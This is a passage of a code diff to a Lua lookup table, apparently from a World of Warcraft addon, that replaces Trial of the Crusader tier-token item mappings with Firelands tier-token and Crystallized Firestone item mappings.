Earthen Scale Sabatons + ["69949"] = { + 69237, -- Living Ember }, - -- Velen's Raiments of Triumph - ["48080"] = { - 47242, -- Trophy of the Crusade + -- Footwraps of Quenched Fire + ["69950"] = { + 69237, -- Living Ember }, - -- Velen's Mantle of Triumph - ["48081"] = { - 47242, -- Trophy of the Crusade + -- Treads of the Craft + ["69951"] = { + 69237, -- Living Ember }, - -- Velen's Mantle of Triumph - ["48082"] = { - 47557, -- Regalia of the Grand Conqueror + -- Ethereal Footfalls + ["69952"] = { + 69237, -- Living Ember }, - -- Velen's Raiments of Triumph - ["48083"] = { - 47557, -- Regalia of the Grand Conqueror + -- Endless Dream Walkers + ["69953"] = { + 69237, -- Living Ember }, - -- Velen's Pants of Triumph - ["48084"] = { - 47557, -- Regalia of the Grand Conqueror + -- Boots of the Black Flame + ["69954"] = { + 69237, -- Living Ember }, - -- Velen's Circlet of Triumph - ["48085"] = { - 47557, -- Regalia of the Grand Conqueror + -- Shoulderguards of the Molten Giant + ["70941"] = { + 71688, -- Mantle of the Fiery Protector }, - -- Velen's Handwraps of Triumph - ["48086"] = { - 47557, -- Regalia of the Grand Conqueror + -- Faceguard of the Molten Giant + ["70944"] = { + 71682, -- Helm of the Fiery Protector }, - -- Zabra's Handwraps of Triumph - ["48087"] = { - 47557, -- Regalia of the Grand Conqueror + -- Immolation Shoulderguards + ["70946"] = { + 71681, -- Mantle of the Fiery Conqueror }, - -- Zabra's Circlet of Triumph - ["48088"] = { - 47557, -- Regalia of the Grand Conqueror + -- Immolation Faceguard + ["70948"] = { + 71675, -- Helm of the Fiery Conqueror }, - -- Zabra's Pants of Triumph - ["48089"] = { - 47557, -- Regalia of the Grand Conqueror + -- Elementium Deathplate Shoulderguards + ["70951"] = { + 71674, -- Mantle of the Fiery Vanquisher }, - -- Zabra's Raiments of Triumph - ["48090"] = { - 47557, -- Regalia of the Grand Conqueror + -- Elementium Deathplate Faceguard + ["70954"] = { + 71668, -- Helm of the Fiery Vanquisher }, - -- Zabra's Mantle of Triumph - ["48091"] = { - 47557, -- Regalia of the Grand Conqueror + -- Dark Phoenix Helmet + ["71047"] = { + 71668, -- Helm of the Fiery Vanquisher }, - -- Zabra's Mantle of Triumph - ["48092"] = { - 47242, -- Trophy of the Crusade + -- Dark Phoenix Spaulders + ["71049"] = { + 71674, -- Mantle of the Fiery Vanquisher }, - -- Zabra's Raiments of Triumph - ["48093"] = { - 47242, -- Trophy of the Crusade + -- Flamewaker's Headguard + ["71051"] = { + 71682, -- Helm of the Fiery Protector }, - -- Zabra's Pants of Triumph - ["48094"] = { - 47242, -- Trophy of the Crusade + -- Flamewaker's Spaulders + ["71053"] = { + 71688, -- Mantle of the Fiery Protector }, - -- Zabra's Circlet of Triumph - ["48095"] = { - 47242, -- Trophy of the Crusade + -- Elementium Deathplate Helmet + ["71060"] = { + 71668, -- Helm of the Fiery Vanquisher }, - -- Zabra's Handwraps of Triumph - ["48096"] = { - 47242, -- Trophy of the Crusade + -- Elementium Deathplate Pauldrons + ["71062"] = { + 71674, -- Mantle of the Fiery Vanquisher }, - -- Malfurion's Handguards of Triumph - ["48133"] = { - 47242, -- Trophy of the Crusade + -- Immolation Helmet + ["71065"] = { + 71675, -- Helm of the Fiery Conqueror }, - -- Malfurion's Headpiece of Triumph - ["48134"] = { - 47242, -- Trophy of the Crusade + -- Immolation Pauldrons + ["71067"] = { + 71681, -- Mantle of the Fiery Conqueror }, - -- Malfurion's Leggings of Triumph - ["48135"] = { - 47242, -- Trophy of the Crusade + -- Helmet of the Molten Giant + ["71070"] = { + 71682, -- Helm of the Fiery Protector }, - -- Malfurion's Robe of Triumph - ["48136"] = { - 47242, -- Trophy of the Crusade + -- Pauldrons of the Molten Giant + ["71072"] = { + 71688, -- Mantle of the Fiery Protector }, - -- Malfurion's Spaulders of Triumph - ["48137"] = { - 47242, -- Trophy of the Crusade + -- Branch of Nordrassil + ["71084"] = { + 71141, -- Eternal Ember }, - -- Malfurion's Spaulders of Triumph - ["48138"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Runestaff of Nordrassil + ["71085"] = { + 69815, -- Seething Cinder }, - -- Malfurion's Robe of Triumph - ["48139"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Dragonwrath, Tarecgosa's Rest + ["71086"] = { + 69815, -- Seething Cinder }, - -- Malfurion's Leggings of Triumph - ["48140"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Headguard + ["71093"] = { + 71675, -- Helm of the Fiery Conqueror }, - -- Malfurion's Headpiece of Triumph - ["48141"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Mantle + ["71095"] = { + 71681, -- Mantle of the Fiery Conqueror }, - -- Malfurion's Handguards of Triumph - ["48142"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Headpiece + ["71098"] = { + 71668, -- Helm of the Fiery Vanquisher }, - -- Runetotem's Handguards of Triumph - ["48143"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Spaulders + ["71101"] = { + 71674, -- Mantle of the Fiery Vanquisher }, - -- Runetotem's Headpiece of Triumph - ["48144"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Helm + ["71103"] = { + 71668, -- Helm of the Fiery Vanquisher }, - -- Runetotem's Leggings of Triumph - ["48145"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Mantle + ["71106"] = { + 71674, -- Mantle of the Fiery Vanquisher }, - -- Runetotem's Robe of Triumph - ["48146"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Cover + ["71108"] = { + 71668, -- Helm of the Fiery Vanquisher }, - -- Runetotem's Spaulders of Triumph - ["48147"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Shoulderwraps + ["71111"] = { + 71674, -- Mantle of the Fiery Vanquisher }, - -- Runetotem's Spaulders of Triumph - ["48148"] = { - 47242, -- Trophy of the Crusade + -- Eternal Ember + ["71141"] = { + 69646, -- Branch of Nordrassil + 71084, -- Branch of Nordrassil }, - -- Runetotem's Robe of Triumph - ["48149"] = { - 47242, -- Trophy of the Crusade + -- Cowl of the Cleansing Flame + ["71272"] = { + 71675, -- Helm of the Fiery Conqueror }, - -- Runetotem's Leggings of Triumph - ["48150"] = { - 47242, -- Trophy of the Crusade + -- Mantle of the Cleansing Flame + ["71275"] = { + 71681, -- Mantle of the Fiery Conqueror }, - -- Runetotem's Headpiece of Triumph - ["48151"] = { - 47242, -- Trophy of the Crusade + -- Hood of the Cleansing Flame + ["71277"] = { + 71675, -- Helm of the Fiery Conqueror }, - -- Runetotem's Handguards of Triumph - ["48152"] = { - 47242, -- Trophy of the Crusade + -- Shoulderwraps of the Cleansing Flame + ["71280"] = { + 71681, -- Mantle of the Fiery Conqueror }, - -- Malfurion's Gloves of Triumph - ["48163"] = { - 47242, -- Trophy of the Crusade + -- Balespider's Hood + ["71282"] = { + 71675, -- Helm of the Fiery Conqueror }, - -- Malfurion's Cover of Triumph - ["48164"] = { - 47242, -- Trophy of the Crusade + -- Balespider's Mantle + ["71285"] = { + 71681, -- Mantle of the Fiery Conqueror }, - -- Malfurion's Trousers of Triumph - ["48165"] = { - 47242, -- Trophy of the Crusade + -- Firehawk Hood + ["71287"] = { + 71668, -- Helm of the Fiery Vanquisher }, - -- Malfurion's Vestments of Triumph - ["48166"] = { - 47242, -- Trophy of the Crusade + -- Firehawk Mantle + ["71290"] = { + 71674, -- Mantle of the Fiery Vanquisher }, - -- Malfurion's Mantle of Triumph - ["48167"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Headpiece + ["71293"] = { + 71682, -- Helm of the Fiery Protector }, - -- Malfurion's Mantle of Triumph - ["48168"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Erupting Volcanic Shoulderwraps + ["71295"] = { + 71688, -- Mantle of the Fiery Protector }, - -- Malfurion's Vestments of Triumph - ["48169"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Erupting Volcanic Faceguard + ["71298"] = { + 71682, -- Helm of the Fiery Protector }, - -- Malfurion's Trousers of Triumph - ["48170"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Erupting Volcanic Mantle + ["71300"] = { + 71688, -- Mantle of the Fiery Protector }, - -- Malfurion's Cover of Triumph - ["48171"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Erupting Volcanic Helmet + ["71303"] = { + 71682, -- Helm of the Fiery Protector }, - -- Malfurion's Gloves of Triumph - ["48172"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Erupting Volcanic Spaulders + ["71305"] = { + 71688, -- Mantle of the Fiery Protector }, - -- Runetotem's Gloves of Triumph - ["48173"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Elementium Deathplate Breastplate + ["71476"] = { + 71672, -- Chest of the Fiery Vanquisher }, - -- Runetotem's Cover of Triumph - ["48174"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Elementium Deathplate Gauntlets + ["71477"] = { + 71669, -- Gauntlets of the Fiery Vanquisher }, - -- Runetotem's Trousers of Triumph - ["48175"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Elementium Deathplate Helmet + ["71478"] = { + 71670, -- Crown of the Fiery Vanquisher }, - -- Runetotem's Vestments of Triumph - ["48176"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Elementium Deathplate Greaves + ["71479"] = { + 71671, -- Leggings of the Fiery Vanquisher }, - -- Runetotem's Mantle of Triumph - ["48177"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Elementium Deathplate Pauldrons + ["71480"] = { + 71673, -- Shoulders of the Fiery Vanquisher }, - -- Runetotem's Mantle of Triumph - ["48178"] = { - 47242, -- Trophy of the Crusade + -- Elementium Deathplate Chestguard + ["71481"] = { + 71672, -- Chest of the Fiery Vanquisher }, - -- Runetotem's Vestments of Triumph - ["48179"] = { - 47242, -- Trophy of the Crusade + -- Elementium Deathplate Handguards + ["71482"] = { + 71669, -- Gauntlets of the Fiery Vanquisher }, - -- Runetotem's Trousers of Triumph - ["48180"] = { - 47242, -- Trophy of the Crusade + -- Elementium Deathplate Faceguard + ["71483"] = { + 71670, -- Crown of the Fiery Vanquisher }, - -- Runetotem's Cover of Triumph - ["48181"] = { - 47242, -- Trophy of the Crusade + -- Elementium Deathplate Legguards + ["71484"] = { + 71671, -- Leggings of the Fiery Vanquisher }, - -- Runetotem's Gloves of Triumph - ["48182"] = { - 47242, -- Trophy of the Crusade + -- Elementium Deathplate Shoulderguards + ["71485"] = { + 71673, -- Shoulders of the Fiery Vanquisher }, - -- Runetotem's Handgrips of Triumph - ["48193"] = { - 47242, -- Trophy of the Crusade + -- Obsidian Arborweave Raiment + ["71486"] = { + 71672, -- Chest of the Fiery Vanquisher }, - -- Runetotem's Headguard of Triumph - ["48194"] = { - 47242, -- Trophy of the Crusade + -- Obsidian Arborweave Grips + ["71487"] = { + 71669, -- Gauntlets of the Fiery Vanquisher }, - -- Runetotem's Legguards of Triumph - ["48195"] = { - 47242, -- Trophy of the Crusade + -- Obsidian Arborweave Headpiece + ["71488"] = { + 71670, -- Crown of the Fiery Vanquisher }, - -- Runetotem's Raiments of Triumph - ["48196"] = { - 47242, -- Trophy of the Crusade + -- Obsidian Arborweave Legguards + ["71489"] = { + 71671, -- Leggings of the Fiery Vanquisher }, - -- Runetotem's Shoulderpads of Triumph - ["48197"] = { - 47242, -- Trophy of the Crusade + -- Obsidian Arborweave Spaulders + ["71490"] = { + 71673, -- Shoulders of the Fiery Vanquisher }, - -- Runetotem's Shoulderpads of Triumph - ["48198"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Handwraps + ["71491"] = { + 71669, -- Gauntlets of the Fiery Vanquisher }, - -- Runetotem's Raiments of Triumph - ["48199"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Helm + ["71492"] = { + 71670, -- Crown of the Fiery Vanquisher }, - -- Runetotem's Legguards of Triumph - ["48200"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Legwraps + ["71493"] = { + 71671, -- Leggings of the Fiery Vanquisher }, - -- Runetotem's Headguard of Triumph - ["48201"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Mantle + ["71495"] = { + 71673, -- Shoulders of the Fiery Vanquisher }, - -- Runetotem's Handgrips of Triumph - ["48202"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Gloves + ["71496"] = { + 71669, -- Gauntlets of the Fiery Vanquisher }, - -- Malfurion's Handgrips of Triumph - ["48203"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Cover + ["71497"] = { + 71670, -- Crown of the Fiery Vanquisher }, - -- Malfurion's Headguard of Triumph - ["48204"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Leggings + ["71498"] = { + 71671, -- Leggings of the Fiery Vanquisher }, - -- Malfurion's Legguards of Triumph - ["48205"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Vestment + ["71499"] = { + 71672, -- Chest of the Fiery Vanquisher }, - -- Malfurion's Raiments of Triumph - ["48206"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Obsidian Arborweave Shoulderwraps + ["71500"] = { + 71673, -- Shoulders of the Fiery Vanquisher }, - -- Malfurion's Shoulderpads of Triumph - ["48207"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Flamewaker's Tunic + ["71501"] = { + 71686, -- Chest of the Fiery Protector }, - -- Malfurion's Shoulderpads of Triumph - ["48208"] = { - 47242, -- Trophy of the Crusade + -- Flamewaker's Gloves + ["71502"] = { + 71683, -- Gauntlets of the Fiery Protector }, - -- Malfurion's Raiments of Triumph - ["48209"] = { - 47242, -- Trophy of the Crusade + -- Flamewaker's Headguard + ["71503"] = { + 71684, -- Crown of the Fiery Protector }, - -- Malfurion's Legguards of Triumph - ["48210"] = { - 47242, -- Trophy of the Crusade + -- Flamewaker's Legguards + ["71504"] = { + 71685, -- Leggings of the Fiery Protector }, - -- Malfurion's Headguard of Triumph - ["48211"] = { - 47242, -- Trophy of the Crusade + -- Flamewaker's Spaulders + ["71505"] = { + 71687, -- Shoulders of the Fiery Protector }, - -- Malfurion's Handgrips of Triumph - ["48212"] = { - 47242, -- Trophy of the Crusade + -- Firehawk Gloves + ["71507"] = { + 71669, -- Gauntlets of the Fiery Vanquisher }, - -- VanCleef's Breastplate of Triumph - ["48223"] = { - 47242, -- Trophy of the Crusade + -- Firehawk Hood + ["71508"] = { + 71670, -- Crown of the Fiery Vanquisher }, - -- VanCleef's Gauntlets of Triumph - ["48224"] = { - 47242, -- Trophy of the Crusade + -- Firehawk Leggings + ["71509"] = { + 71671, -- Leggings of the Fiery Vanquisher }, - -- VanCleef's Helmet of Triumph - ["48225"] = { - 47242, -- Trophy of the Crusade + -- Firehawk Robes + ["71510"] = { + 71672, -- Chest of the Fiery Vanquisher }, - -- VanCleef's Legplates of Triumph - ["48226"] = { - 47242, -- Trophy of the Crusade + -- Firehawk Mantle + ["71511"] = { + 71673, -- Shoulders of the Fiery Vanquisher }, - -- VanCleef's Pauldrons of Triumph - ["48227"] = { - 47242, -- Trophy of the Crusade + -- Immolation Battleplate + ["71512"] = { + 71679, -- Chest of the Fiery Conqueror }, - -- VanCleef's Pauldrons of Triumph - ["48228"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Gauntlets + ["71513"] = { + 71676, -- Gauntlets of the Fiery Conqueror + }, + -- Immolation Helmet + ["71514"] = { + 71677, -- Crown of the Fiery Conqueror }, - -- VanCleef's Legplates of Triumph - ["48229"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Legplates + ["71515"] = { + 71678, -- Leggings of the Fiery Conqueror }, - -- VanCleef's Helmet of Triumph - ["48230"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Pauldrons + ["71516"] = { + 71680, -- Shoulders of the Fiery Conqueror }, - -- VanCleef's Gauntlets of Triumph - ["48231"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Breastplate + ["71517"] = { + 71679, -- Chest of the Fiery Conqueror }, - -- VanCleef's Breastplate of Triumph - ["48232"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Gloves + ["71518"] = { + 71676, -- Gauntlets of the Fiery Conqueror }, - -- Garona's Breastplate of Triumph - ["48233"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Headguard + ["71519"] = { + 71677, -- Crown of the Fiery Conqueror }, - -- Garona's Gauntlets of Triumph - ["48234"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Greaves + ["71520"] = { + 71678, -- Leggings of the Fiery Conqueror }, - -- Garona's Helmet of Triumph - ["48235"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Mantle + ["71521"] = { + 71680, -- Shoulders of the Fiery Conqueror }, - -- Garona's Legplates of Triumph - ["48236"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Chestguard + ["71522"] = { + 71679, -- Chest of the Fiery Conqueror }, - -- Garona's Pauldrons of Triumph - ["48237"] = { - 47559, -- Regalia of the Grand Vanquisher + -- Immolation Handguards + ["71523"] = { + 71676, -- Gauntlets of the Fiery Conqueror }, - -- Garona's Pauldrons of Triumph - ["48238"] = { - 47242, -- Trophy of the Crusade + -- Immolation Faceguard + ["71524"] = { + 71677, -- Crown of the Fiery Conqueror }, - -- Garona's Legplates of Triumph - ["48239"] = { - 47242, -- Trophy of the Crusade + -- Immolation Legguards + ["71525"] = { + 71678, -- Leggings of the Fiery Conqueror }, - -- Garona's Helmet of Triumph - ["48240"] = { - 47242, -- Trophy of the Crusade + -- Immolation Shoulderguards + ["71526"] = { + 71680, -- Shoulders of the Fiery Conqueror }, - -- Garona's Gauntlets of Triumph - ["48241"] = { - 47242, -- Trophy of the Crusade + -- Handwraps of the Cleansing Flame + ["71527"] = { + 71676, -- Gauntlets of the Fiery Conqueror }, - -- Garona's Breastplate of Triumph - ["48242"] = { - 47242, -- Trophy of the Crusade + -- Cowl of the Cleansing Flame + ["71528"] = { + 71677, -- Crown of the Fiery Conqueror }, - -- Windrunner's Tunic of Triumph - ["48255"] = { - 47242, -- Trophy of the Crusade + -- Legwraps of the Cleansing Flame + ["71529"] = { + 71678, -- Leggings of the Fiery Conqueror }, - -- Windrunner's Handguards of Triumph - ["48256"] = { - 47242, -- Trophy of the Crusade + -- Robes of the Cleansing Flame + ["71530"] = { + 71679, -- Chest of the Fiery Conqueror }, - -- Windrunner's Headpiece of Triumph - ["48257"] = { - 47242, -- Trophy of the Crusade + -- Mantle of the Cleansing Flame + ["71531"] = { + 71680, -- Shoulders of the Fiery Conqueror }, - -- Windrunner's Legguards of Triumph - ["48258"] = { - 47242, -- Trophy of the Crusade + -- Gloves of the Cleansing Flame + ["71532"] = { + 71676, -- Gauntlets of the Fiery Conqueror }, - -- Windrunner's Spaulders of Triumph - ["48259"] = { - 47242, -- Trophy of the Crusade + -- Hood of the Cleansing Flame + ["71533"] = { + 71677, -- Crown of the Fiery Conqueror }, - -- Windrunner's Spaulders of Triumph - ["48260"] = { - 47558, -- Regalia of the Grand Protector + -- Leggings of the Cleansing Flame + ["71534"] = { + 71678, -- Leggings of the Fiery Conqueror }, - -- Windrunner's Legguards of Triumph - ["48261"] = { - 47558, -- Regalia of the Grand Protector + -- Vestment of the Cleansing Flame + ["71535"] = { + 71679, -- Chest of the Fiery Conqueror }, - -- Windrunner's Headpiece of Triumph - ["48262"] = { - 47558, -- Regalia of the Grand Protector + -- Shoulderwraps of the Cleansing Flame + ["71536"] = { + 71680, -- Shoulders of the Fiery Conqueror }, - -- Windrunner's Handguards of Triumph - ["48263"] = { - 47558, -- Regalia of the Grand Protector + -- Dark Phoenix Tunic + ["71537"] = { + 71672, -- Chest of the Fiery Vanquisher }, - -- Windrunner's Tunic of Triumph - ["48264"] = { - 47558, -- Regalia of the Grand Protector + -- Dark Phoenix Gloves + ["71538"] = { + 71669, -- Gauntlets of the Fiery Vanquisher }, - -- Windrunner's Tunic of Triumph - ["48265"] = { - 47558, -- Regalia of the Grand Protector + -- Dark Phoenix Helmet + ["71539"] = { + 71670, -- Crown of the Fiery Vanquisher }, - -- Windrunner's Handguards of Triumph - ["48266"] = { - 47558, -- Regalia of the Grand Protector + -- Dark Phoenix Legguards + ["71540"] = { + 71671, -- Leggings of the Fiery Vanquisher }, - -- Windrunner's Headpiece of Triumph - ["48267"] = { - 47558, -- Regalia of the Grand Protector + -- Dark Phoenix Spaulders + ["71541"] = { + 71673, -- Shoulders of the Fiery Vanquisher }, - -- Windrunner's Legguards of Triumph - ["48268"] = { - 47558, -- Regalia of the Grand Protector + -- Erupting Volcanic Tunic + ["71542"] = { + 71686, -- Chest of the Fiery Protector }, - -- Windrunner's Spaulders of Triumph - ["48269"] = { - 47558, -- Regalia of the Grand Protector + -- Erupting Volcanic Handwraps + ["71543"] = { + 71683, -- Gauntlets of the Fiery Protector }, - -- Windrunner's Spaulders of Triumph - ["48270"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Faceguard + ["71544"] = { + 71684, -- Crown of the Fiery Protector }, - -- Windrunner's Legguards of Triumph - ["48271"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Legwraps + ["71545"] = { + 71685, -- Leggings of the Fiery Protector }, - -- Windrunner's Headpiece of Triumph - ["48272"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Mantle + ["71546"] = { + 71687, -- Shoulders of the Fiery Protector }, - -- Windrunner's Handguards of Triumph - ["48273"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Cuirass + ["71547"] = { + 71686, -- Chest of the Fiery Protector }, - -- Windrunner's Tunic of Triumph - ["48274"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Grips + ["71548"] = { + 71683, -- Gauntlets of the Fiery Protector }, - -- Nobundo's Tunic of Triumph - ["48285"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Helmet + ["71549"] = { + 71684, -- Crown of the Fiery Protector }, - -- Nobundo's Handguards of Triumph - ["48286"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Legguards + ["71550"] = { + 71685, -- Leggings of the Fiery Protector }, - -- Nobundo's Headpiece of Triumph - ["48287"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Spaulders + ["71551"] = { + 71687, -- Shoulders of the Fiery Protector }, - -- Nobundo's Legguards of Triumph - ["48288"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Hauberk + ["71552"] = { + 71686, -- Chest of the Fiery Protector }, - -- Nobundo's Spaulders of Triumph - ["48289"] = { - 47242, -- Trophy of the Crusade + -- Erupting Volcanic Gloves + ["71553"] = { + 71683, -- Gauntlets of the Fiery Protector }, - -- Nobundo's Spaulders of Triumph - ["48290"] = { - 47558, -- Regalia of the Grand Protector + -- Erupting Volcanic Headpiece + ["71554"] = { + 71684, -- Crown of the Fiery Protector }, - -- Nobundo's Legguards of Triumph - ["48291"] = { - 47558, -- Regalia of the Grand Protector + -- Erupting Volcanic Kilt + ["71555"] = { + 71685, -- Leggings of the Fiery Protector }, - -- Nobundo's Headpiece of Triumph - ["48292"] = { - 47558, -- Regalia of the Grand Protector + -- Erupting Volcanic Shoulderwraps + ["71556"] = { + 71687, -- Shoulders of the Fiery Protector + }, + -- Ranseur of Hatred + ["71557"] = { + 71617, -- Crystallized Firestone }, - -- Nobundo's Handguards of Triumph - ["48293"] = { - 47558, -- Regalia of the Grand Protector + -- Lava Bolt Crossbow + ["71558"] = { + 71617, -- Crystallized Firestone }, - -- Nobundo's Tunic of Triumph - ["48294"] = { - 47558, -- Regalia of the Grand Protector + -- Spire of Scarlet Pain + ["71559"] = { + 71617, -- Crystallized Firestone }, - -- Thrall's Tunic of Triumph - ["48300"] = { - 47242, -- Trophy of the Crusade + -- Chelley's Sterilized Scalpel + ["71560"] = { + 71617, -- Crystallized Firestone }, - -- Thrall's Handguards of Triumph - ["48301"] = { - 47242, -- Trophy of the Crusade + -- Hide-Bound Chains + ["71561"] = { + 71617, -- Crystallized Firestone }, - -- Thrall's Headpiece of Triumph - ["48302"] = { - 47242, -- Trophy of the Crusade + -- Obsidium Cleaver + ["71562"] = { + 71617, -- Crystallized Firestone }, - -- Thrall's Legguards of Triumph - ["48303"] = { - 47242, -- Trophy of the Crusade + -- Firebound Gorget + ["71563"] = { + 71617, -- Crystallized Firestone }, - -- Thrall's Spaulders of Triumph - ["48304"] = { - 47242, -- Trophy of the Crusade + -- Theck's Emberseal + ["71564"] = { + 71617, -- Crystallized Firestone }, - -- Thrall's Tunic of Triumph - ["48305"] = { - 47558, -- Regalia of the Grand Protector + -- Trail of Embers + ["71575"] = { + 71617, -- Crystallized Firestone }, - -- Thrall's Handguards of Triumph - ["48306"] = { - 47558, -- Regalia of the Grand Protector + -- Scorchvine Wand + ["71579"] = { + 71617, -- Crystallized Firestone }, - -- Thrall's Headpiece of Triumph - ["48307"] = { - 47558, -- Regalia of the Grand Protector + -- Balespider's Handwraps + ["71594"] = { + 71676, -- Gauntlets of the Fiery Conqueror }, - -- Thrall's Legguards of Triumph - ["48308"] = { - 47558, -- Regalia of the Grand Protector + -- Balespider's Hood + ["71595"] = { + 71677, -- Crown of the Fiery Conqueror }, - -- Thrall's Spaulders of Triumph - ["48309"] = { - 47558, -- Regalia of the Grand Protector + -- Balespider's Leggings + ["71596"] = { + 71678, -- Leggings of the Fiery Conqueror }, - -- Nobundo's Hauberk of Triumph - ["48316"] = { - 47242, -- Trophy of the Crusade + -- Balespider's Robes + ["71597"] = { + 71679, -- Chest of the Fiery Conqueror }, - -- Nobundo's Gloves of Triumph - ["48317"] = { - 47242, -- Trophy of the Crusade + -- Balespider's Mantle + ["71598"] = { + 71680, -- Shoulders of the Fiery Conqueror }, - -- Nobundo's Helm of Triumph - ["48318"] = { - 47242, -- Trophy of the Crusade + -- Helmet of the Molten Giant + ["71599"] = { + 71684, -- Crown of the Fiery Protector }, - -- Nobundo's Kilt of Triumph - ["48319"] = { - 47242, -- Trophy of the Crusade + -- Battleplate of the Molten Giant + ["71600"] = { + 71686, -- Chest of the Fiery Protector }, - -- Nobundo's Shoulderpads of Triumph - ["48320"] = { - 47242, -- Trophy of the Crusade + -- Gauntlets of the Molten Giant + ["71601"] = { + 71683, -- Gauntlets of the Fiery Protector }, - -- Nobundo's Shoulderpads of Triumph - ["48321"] = { - 47558, -- Regalia of the Grand Protector + -- Legplates of the Molten Giant + ["71602"] = { + 71685, -- Leggings of the Fiery Protector }, - -- Nobundo's Kilt of Triumph - ["48322"] = { - 47558, -- Regalia of the Grand Protector + -- Pauldrons of the Molten Giant + ["71603"] = { + 71687, -- Shoulders of the Fiery Protector }, - -- Nobundo's Helm of Triumph - ["48323"] = { - 47558, -- Regalia of the Grand Protector + -- Chestguard of the Molten Giant + ["71604"] = { + 71686, -- Chest of the Fiery Protector }, - -- Nobundo's Gloves of Triumph - ["48324"] = { - 47558, -- Regalia of the Grand Protector + -- Handguards of the Molten Giant + ["71605"] = { + 71683, -- Gauntlets of the Fiery Protector }, - -- Nobundo's Hauberk of Triumph - ["48325"] = { - 47558, -- Regalia of the Grand Protector + -- Faceguard of the Molten Giant + ["71606"] = { + 71684, -- Crown of the Fiery Protector }, - -- Thrall's Hauberk of Triumph - ["48326"] = { - 47558, -- Regalia of the Grand Protector + -- Legguards of the Molten Giant + ["71607"] = { + 71685, -- Leggings of the Fiery Protector }, - -- Thrall's Gloves of Triumph - ["48327"] = { - 47558, -- Regalia of the Grand Protector + -- Shoulderguards of the Molten Giant + ["71608"] = { + 71687, -- Shoulders of the Fiery Protector }, - -- Thrall's Helm of Triumph - ["48328"] = { - 47558, -- Regalia of the Grand Protector + -- Crystallized Firestone + ["71617"] = { + 69109, -- Scales of Life + 69113, -- Apparatus of Khaz'goroth + 71557, -- Ranseur of Hatred + 71558, -- Lava Bolt Crossbow + 71559, -- Spire of Scarlet Pain + 71560, -- Chelley's Sterilized Scalpel + 71561, -- Hide-Bound Chains + 71562, -- Obsidium Cleaver + 71563, -- Firebound Gorget + 71564, -- Theck's Emberseal + 71575, -- Trail of Embers + 71579, -- Scorchvine Wand + 71641, -- Riplimb's Lost Collar }, - -- Thrall's Kilt of Triumph - ["48329"] = { - 47558, -- Regalia of the Grand Protector + -- Riplimb's Lost Collar + ["71641"] = { + 71617, -- Crystallized Firestone }, - -- Thrall's Shoulderpads of Triumph - ["48330"] = { - 47558, -- Regalia of the Grand Protector + -- Helm of the Fiery Vanquisher + ["71668"] = { + 70954, -- Elementium Deathplate Faceguard + 71047, -- Dark Phoenix Helmet + 71060, -- Elementium Deathplate Helmet + 71098, -- Obsidian Arborweave Headpiece + 71103, -- Obsidian Arborweave Helm + 71108, -- Obsidian Arborweave Cover + 71287, -- Firehawk Hood }, - -- Thrall's Shoulderpads of Triumph - ["48331"] = { - 47242, -- Trophy of the Crusade + -- Gauntlets of the Fiery Vanquisher + ["71669"] = { + 71477, -- Elementium Deathplate Gauntlets + 71482, -- Elementium Deathplate Handguards + 71487, -- Obsidian Arborweave Grips + 71491, -- Obsidian Arborweave Handwraps + 71496, -- Obsidian Arborweave Gloves + 71507, -- Firehawk Gloves + 71538, -- Dark Phoenix Gloves }, - -- Thrall's Kilt of Triumph - ["48332"] = { - 47242, -- Trophy of the Crusade + -- Crown of the Fiery Vanquisher + ["71670"] = { + 71478, -- Elementium Deathplate Helmet + 71483, -- Elementium Deathplate Faceguard + 71488, -- Obsidian Arborweave Headpiece + 71492, -- Obsidian Arborweave Helm + 71497, -- Obsidian Arborweave Cover + 71508, -- 